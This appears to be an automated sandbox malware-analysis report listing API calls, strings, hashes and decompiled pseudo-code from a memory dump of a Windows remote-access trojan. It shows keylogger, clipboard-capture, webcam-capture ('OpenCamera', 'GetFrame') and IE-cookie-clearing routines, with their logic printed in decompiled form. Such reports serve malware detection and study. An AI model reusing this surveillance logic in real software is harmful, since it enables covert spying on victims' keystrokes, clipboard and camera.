                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,745E73F0,?), ref: 004069D7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?, [Ctrl + V][Following text has been pasted from clipboard:],00000000,?,[End of clipboard text],00000000,?,745E73F0,?), ref: 00406A01
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text],00000000,?,745E73F0,?), ref: 00406A0B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,745E73F0,?), ref: 00406A1D
                                        • tolower.MSVCRT ref: 00406A3A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000001,?), ref: 00406ABF
                                        Strings
                                        • [End of clipboard text], xrefs: 004069EC
                                        • [Ctrl + , xrefs: 00406996
                                        • [Ctrl + V][Following text has been pasted from clipboard:], xrefs: 004069FB
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@$V01@V01@@V10@Y?$basic_string@toupper$EventV10@0@V10@@tolower
                                        • String ID: [End of clipboard text]$ [Ctrl + $ [Ctrl + V][Following text has been pasted from clipboard:]
                                        • API String ID: 1567161615-398269065
                                        • Opcode ID: f1e6f1152cf9d43577f9c2263c6a6138d0f68f1c9ac30bffadcf0155f9edcbe5
                                        • Instruction ID: a9543fe512128afdcb68fc0767362bf76cb8ddc06e86ce3b10f85a644f0edd6d
                                        • Opcode Fuzzy Hash: f1e6f1152cf9d43577f9c2263c6a6138d0f68f1c9ac30bffadcf0155f9edcbe5
                                        • Instruction Fuzzy Hash: 1141D571904708FBCB14F7E8E8499EFBB7CAB81300B14447BF403B3191DA795A598B5A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00407767, Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 110COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,73B76490,00000000), ref: 00407779
                                          • Part of subcall function 0040B522: RegOpenKeyExA.KERNELBASE(?,80000002,00000000,00020119,80000002,00000000), ref: 0040B551
                                          • Part of subcall function 0040B522: RegQueryValueExA.KERNELBASE(80000002,004140D8,00000000,00000000,?,00000400), ref: 0040B56E
                                          • Part of subcall function 0040B522: RegCloseKey.ADVAPI32(80000002), ref: 0040B577
                                          • Part of subcall function 0040B522: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040B596
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004077A1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004077AA
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 004077B9
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000104), ref: 004077E7
                                        • ExpandEnvironmentStringsA.KERNEL32(00000000), ref: 004077EE
                                        • PathFileExistsA.SHLWAPI(?), ref: 004077FB
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,00000000), ref: 0040781D
                                          • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                          • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                          • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                          • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                          • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00407834
                                          • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C0A
                                          • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412C1E
                                          • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C2A
                                          • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412C38
                                          • Part of subcall function 00412BEE: FindFirstFileW.KERNEL32(?,?), ref: 00412C4B
                                          • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C6B
                                          • Part of subcall function 00412BEE: FindNextFileW.KERNEL32(004085F5,?), ref: 00412C83
                                          • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412CB4
                                          • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(?), ref: 00412CD9
                                          • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412CE9
                                          • Part of subcall function 00412BEE: FindClose.KERNEL32(004085F5), ref: 00412D39
                                          • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(004085F5), ref: 00412D42
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407846
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040784F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],00000000), ref: 00407867
                                        • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00415F98,00000000), ref: 00407884
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],00000000), ref: 0040789E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004078AF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@$G@2@@std@@G@std@@$??1?$basic_string@D@1@@$wcscpy$FileFindwcscat$?begin@?$basic_string@?c_str@?$basic_string@CloseDirectoryRemoveV01@@$??4?$basic_string@??8std@@?end@?$basic_string@?find@?$basic_string@?length@?$basic_string@D@2@@0@EnvironmentExistsExpandFirstG@1@@NextOpenPathQueryStringsV01@V?$basic_string@Value
                                        • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                        • API String ID: 4038348890-4073444585
                                        • Opcode ID: df8b2c35f0d50c2ef97645c4f9b0cabf715f8f8ad6b3b259de4eb31e8b051f1a
                                        • Instruction ID: e1c57ca4753d391c226bd1858ab1e9d7f4a425f5166415fba7c1daa74d5850da
                                        • Opcode Fuzzy Hash: df8b2c35f0d50c2ef97645c4f9b0cabf715f8f8ad6b3b259de4eb31e8b051f1a
                                        • Instruction Fuzzy Hash: 0F317F72904609EBCB00FBE0DD89DEE777CEB44345B104076F412A3190EB75AA49CBAA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00401CCF, Relevance: 31.6, APIs: 14, Strings: 4, Instructions: 132sleepCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 19%
                                        			E00401CCF(intOrPtr* __eax, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v20;
				char _v36;
				void* __ebp;
				void* _t22;
				void* _t23;
				void* _t32;
				char* _t33;
				void* _t36;
				void* _t38;
				signed char _t39;
				signed char _t41;
				char* _t42;
				int _t43;
				intOrPtr _t65;
				signed char _t66;
				void* _t68;
				intOrPtr* _t71;

				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t65 =  *__eax;
				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(__eflags,  &_v20,  &_v36, 0x41b310,  &_v36, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
				_t71 = _t68 + 0x24;
				_t22 = _t65 - 0x3c;
				if(_t22 == 0) {
					_t23 = E0040180C( &_v20, __eflags, 0);
					__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					_t66 = E00406DD9(_t23);
					__eflags = _t66;
					if(_t66 != 0) {
						 *0x41b2ec = E00407033(_t66, "OpenCamera");
						 *0x41b2f0 = E00407033(_t66, "CloseCamera");
						 *0x41b2f4 = E00407033(_t66, "GetFrame");
						 *0x41b2f8 = E00407033(_t66, "FreeFrame");
						 *0x41b2e8 = 1;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(0x41b290);
						_push(0x1b);
						goto L15;
					}
				} else {
					_t32 = _t22 - 1;
					if(_t32 == 0) {
						__eflags =  *0x41b2e9;
						if(__eflags != 0) {
							goto L8;
						}
					} else {
						_t36 = _t32 - 1;
						if(_t36 == 0) {
							 *0x41b2f0();
							 *0x41b2e9 =  *0x41b2e9 & 0x00000000;
						} else {
							_t38 = _t36 - 1;
							if(_t38 == 0) {
								_t39 =  *0x41b2ec();
								__eflags = _t39;
								 *0x41b2e9 = _t39;
								if(__eflags == 0) {
									goto L9;
								} else {
									L8:
									_t33 = E0040180C( &_v20, __eflags, 0);
									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
									_push(atoi(_t33));
									_push(_a4);
									E00401EA2(__eflags);
								}
							} else {
								if(_t38 == 1) {
									_t41 =  *0x41b2ec();
									_t81 = _t41;
									 *0x41b2e9 = _t41;
									if(_t41 == 0) {
										L9:
										__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(0x41b290);
										_push(0x41);
										L15:
										E004020C2(_a4);
									} else {
										_t42 = E0040180C( &_v20, _t81, 0);
										__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
										_t43 = atoi(_t42);
										 *_t71 = 0x3e8;
										Sleep(??);
										E00401EA2(_t81);
										 *0x41b2f0(_a4, _t43);
									}
								}
							}
						}
					}
				}
				E004017DD( &_v20);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}




















                                        0x00401cd9
                                        0x00401cdf
                                        0x00401cf1
                                        0x00401d01
                                        0x00401d10
                                        0x00401d1a
                                        0x00401d21
                                        0x00401d24
                                        0x00401d27
                                        0x00401e08
                                        0x00401e0f
                                        0x00401e1b
                                        0x00401e1e
                                        0x00401e20
                                        0x00401e33
                                        0x00401e43
                                        0x00401e53
                                        0x00401e60
                                        0x00401e67
                                        0x00401e73
                                        0x00401e79
                                        0x00000000
                                        0x00401e79
                                        0x00401d2d
                                        0x00401d2d
                                        0x00401d2e
                                        0x00401df4
                                        0x00401dfb
                                        0x00000000
                                        0x00401e01
                                        0x00401d34
                                        0x00401d34
                                        0x00401d35
                                        0x00401de2
                                        0x00401de8
                                        0x00401d3b
                                        0x00401d3b
                                        0x00401d3c
                                        0x00401d92
                                        0x00401d98
                                        0x00401d9a
                                        0x00401d9f
                                        0x00000000
                                        0x00401da1
                                        0x00401da1
                                        0x00401da6
                                        0x00401dad
                                        0x00401dba
                                        0x00401dbb
                                        0x00401dbe
                                        0x00401dc3
                                        0x00401d3e
                                        0x00401d3f
                                        0x00401d45
                                        0x00401d4b
                                        0x00401d4d
                                        0x00401d52
                                        0x00401dcb
                                        0x00401dd5
                                        0x00401ddb
                                        0x00401e7b
                                        0x00401e7e
                                        0x00401d54
                                        0x00401d59
                                        0x00401d60
                                        0x00401d67
                                        0x00401d6f
                                        0x00401d76
                                        0x00401d80
                                        0x00401d87
                                        0x00401d87
                                        0x00401d52
                                        0x00401d3f
                                        0x00401d3c
                                        0x00401d35
                                        0x00401d2e
                                        0x00401e86
                                        0x00401e8e
                                        0x00401e97
                                        0x00401ea1

                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401CD9
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,69D65DF0), ref: 00401CF1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00401D01
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401D10
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401D60
                                        • atoi.MSVCRT ref: 00401D67
                                        • Sleep.KERNEL32 ref: 00401D76
                                          • Part of subcall function 00401EA2: _EH_prolog.MSVCRT ref: 00401EA7
                                          • Part of subcall function 00401EA2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00401EDE
                                          • Part of subcall function 00401EA2: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041B310,?,0041B310,0041B290), ref: 00401F05
                                          • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F1C
                                          • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F29
                                          • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F36
                                          • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F40
                                          • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000060), ref: 00401F55
                                          • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F5E
                                          • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F67
                                          • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F70
                                          • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F79
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401DAD
                                        • atoi.MSVCRT ref: 00401DB4
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290), ref: 00401DD5
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401E0F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290,00000000,CloseCamera,00000000,OpenCamera), ref: 00401E73
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401E8E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401E97
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$V01@@$D@2@@0@Hstd@@V10@0@V?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@V12@$?substr@?$basic_string@D@1@@atoi$??4?$basic_string@?data@?$basic_string@?find@?$basic_string@?size@?$basic_string@H_prologSleepV01@
                                        • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                        • API String ID: 3050406488-3547787478
                                        • Opcode ID: ae9937307aeeb6decfdbd23ab4b6f41bf0febac1b666599084c879192010cd0a
                                        • Instruction ID: 929695bb366bec32bbf7bff6ad9df781dd06acba2e16bfd5a529381622b13abb
                                        • Opcode Fuzzy Hash: ae9937307aeeb6decfdbd23ab4b6f41bf0febac1b666599084c879192010cd0a
                                        • Instruction Fuzzy Hash: A7417231A00609DBCB00ABB5EC4DAED3B65EF54344F00847BE816A72E1DB789545C7DD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00405DD3, Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 75timeCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 33%
                                        			E00405DD3(void* __ecx, char _a4) {
				struct _SYSTEMTIME _v20;
				char _v36;
				char _v52;
				char* _t24;
				char* _t25;
				char* _t33;
				int _t34;
				void* _t46;
				void* _t47;

				_t47 = __ecx;
				GetLocalTime( &_v20);
				_t24 =  &_v52;
				L00414176();
				_t25 =  &_v36;
				L00414170();
				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t25, _t25, _t24, _t24, "\r\n[%04i/%02i/%02i %02i:%02i:%02i ",  &_a4, "]\r\n");
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				_t46 = malloc(_t25 + 0x64);
				_t33 = _v20.wYear & 0x0000ffff;
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t33, _v20.wMonth & 0x0000ffff, _v20.wDay & 0x0000ffff, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff);
				_t34 = sprintf(_t46, _t33);
				if( *((char*)(_t47 + 0x3c)) != 0) {
					__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(_t46);
				}
				if( *((char*)(_t47 + 0x3d)) != 0) {
					__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(_t46);
					_t20 = _t47 + 0x34; // 0x0
					_t34 = SetEvent( *_t20);
				}
				free(_t46);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t34;
			}












                                        0x00405dde
                                        0x00405de1
                                        0x00405df0
                                        0x00405df9
                                        0x00405e02
                                        0x00405e06
                                        0x00405e12
                                        0x00405e1b
                                        0x00405e24
                                        0x00405e2d
                                        0x00405e3d
                                        0x00405e5c
                                        0x00405e61
                                        0x00405e69
                                        0x00405e76
                                        0x00405e7c
                                        0x00405e7c
                                        0x00405e86
                                        0x00405e8c
                                        0x00405e92
                                        0x00405e95
                                        0x00405e95
                                        0x00405e9c
                                        0x00405ea6
                                        0x00405eaf

                                        APIs
                                        • GetLocalTime.KERNEL32(?,73B743E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                        • malloc.MSVCRT ref: 00405E37
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                        • sprintf.MSVCRT ref: 00405E69
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                        • SetEvent.KERNEL32(00000000), ref: 00405E95
                                        • free.MSVCRT(00000000), ref: 00405E9C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@V01@$D@2@@0@Hstd@@V?$basic_string@Y?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@EventLocalTimeV01@@V10@V10@@freemallocsprintf
                                        • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                        • API String ID: 2201004561-248792730
                                        • Opcode ID: d1962dcfa14961cf68a21e729b42b9462e143896443955e606cf191a9ecd47ee
                                        • Instruction ID: 187d607a52c4f966b55e3f01ad30cf50bd50e30255d112ea0a9885b9183f1b4a
                                        • Opcode Fuzzy Hash: d1962dcfa14961cf68a21e729b42b9462e143896443955e606cf191a9ecd47ee
                                        • Instruction Fuzzy Hash: F6213676800619FFCB109B94ED49DFE7BBCFF54745B04442AF952D20A0DB789644CB68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00402440, Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 72networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                        • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
